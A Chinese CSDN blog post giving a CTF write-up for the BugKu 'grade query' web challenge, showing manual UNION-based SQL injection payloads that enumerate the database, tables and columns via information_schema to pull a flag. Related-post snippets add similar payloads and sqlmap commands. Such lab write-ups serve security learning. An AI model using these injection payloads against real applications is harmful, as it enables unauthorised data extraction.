BugKu_web17(成绩查询)

最新推荐文章于 2022-11-28 10:36:27 发布
最新推荐文章于 2022-11-28 10:36:27 发布
阅读量337 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: 数据库 CTF SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/116524215
版权

SQL注入 漏洞利用 数据库安全 信息查询 安全测试
关键词由CSDN通过智能技术生成

在这里插入图片描述成绩查询,数据库交互,那就在考察SQL注入漏洞。
正常输入1,2,3试试。
在这里插入图片描述就正常步骤判断是否存在sql注入。

  • 输入1
    有反应
  • 输入1’#
    没有反应
    判断是字符型注入

在这里插入图片描述在这里插入图片描述然后用火狐插件max Hackbar做题目。
我这里是用union查询的,union查询的前提是要知道字段数。
用order by 1# 类似的来判断字段数

就停的输入:
id=1' order by 1#
id=1' order by 2#
id=1' order by 3#
id=1' order by 4#
id=1' order by 5#
......

到了id=1’ order by 5#时就没反应了
所以字段数为4.
构造sql 语句:

id=' union select 1,2,3,4 #

在这里插入图片描述现在就是将1,2,3,4替换成我们想查询的东西就好了。

第一步:查询数据库名称
id=' union select database(),2,3,4#

在这里插入图片描述所以数据库名称是 :skctf

第二步:查表名
id=' union select group_concat(table_name) ,2,3,4 from information_schema.tables where table_schema=database()#

在这里插入图片描述有两个表:
fl4g ,src
(flag 应该是在fl4g中)

第三步查询列名:

查询fl4g中的列名:

id=' union select group_concat(column_name) ,2,3,4 from information_schema.columns where table_name='fl4g'#

在这里插入图片描述找到skctf_flag这个列

第四步 :查具体数据
id=' union select skctf_flag, 2,3,4 from fl4g#

在这里插入图片描述拿到flag.

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BWVS.rar_BWVS bugku_vulnerability
09-23
Bugku Web Vulnerability System
我修好了学校教务处网站BUG
qq_31738343的博客
12-22 651
修复学校教务处网站功能不能使用的问题
Bugku 成绩查询WEB
soysauce123的博客
08-15 462
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
bugku--成绩查询
hxhabcd123的博客
08-28 1479
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
Bugku-web成绩查询
weixin_42939822的博客
03-14 3434
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugku WEB 成绩查询
weixin_52665674的博客
11-28 583
bugku web题:成绩查询
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku-writeup-web-成绩查询
dark的博客
06-16 227
bugku-web成绩查询解题思路记录。” 题目:
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1659
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 看源...
Bugku Web CTF-学生成绩查询
No Title
12-16 1192
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
Bugku CTF-web17 成绩
weixin_44023403的博客
05-15 297
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
Bugku web 成绩
S123KO的博客
08-24 292
本题直接在页面中的查询栏输入: 1' order by 4# (求出列数4列) 1' and 1=2 union select 1,2,3,4# (求显示位) 1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag) 1'and 1=2 union select 1,2,3,group_concat(table_name)from...
Bugku WEB 成绩查询
qq_41696858的博客
07-04 244
1.打开场景,是一个成绩查询系统,按照提示常规操作1,2,3,4…试试试,发现只有三条数据 2.单引号尝试,没输出,考虑是单引号闭合,加#尝试,确认存在sql注入 3.接下来可以用sqlmap直接跑,也可以自己手工爆破,亲测sqlmap跑的相当慢,建议自己手工注 sqlmap跑过程:随便查询什么,burp抓包,导入到sqlmap中,以1.txt为例 sqlmap -l 1.txt sqlmap -l 1.txt --dbs //爆数据库 sqlmap -l 1.txt -D skctf --tables /
bugku web 成绩查询
cuddlylm的博客
06-25 181
输入1试试 输入2的回显 输入3的回显 怀疑是sql注入 输入1'的回显,报错 1 and 1=1 回显如下 就可以确定时sql注入里的整数型注入了 1、字段用order by 先试试id=1' order by 4# 用 ' 闭合前面的句子,用 # 注释后面的句子 再试试id=1' order by 5# 没有回显,就说明这里只有四个字段。 2、然后就是要看它的显位点有几个,用id=-1' union select 1,2,3,4#,这里用id=-1时因为如果用id=1或者其他数据库里面.
Bugku学生成绩查询
qq_44813849的博客
03-19 2109
打开网站之后进入界面输入1,2,3分别能到1,2,3号学生的成绩,其余便查询不到。猜测是sql注入
bugku成绩
qq_43677324的博客
03-09 897
bugku成绩单 详细解析 1,我们首先分别输入1,2,3, 均有输出 我们输入1’ 没有回响 因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响 但是当我们使用 1' order by 5# 时,没有回响 因此我们可以根据此判断字段数为4 3, 之后就是最精彩的地...
bugku file_get_contents
最新发布
04-08
我不确定您的问题具体是什么,但是如果您正在讨论BugKu平台的file_get_contents功能,则可以说该功能是用于从文件中读取数据的PHP函数。可能存在一些与该功能相关的问题或错误,您需要进一步说明您遇到的问题或情况...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值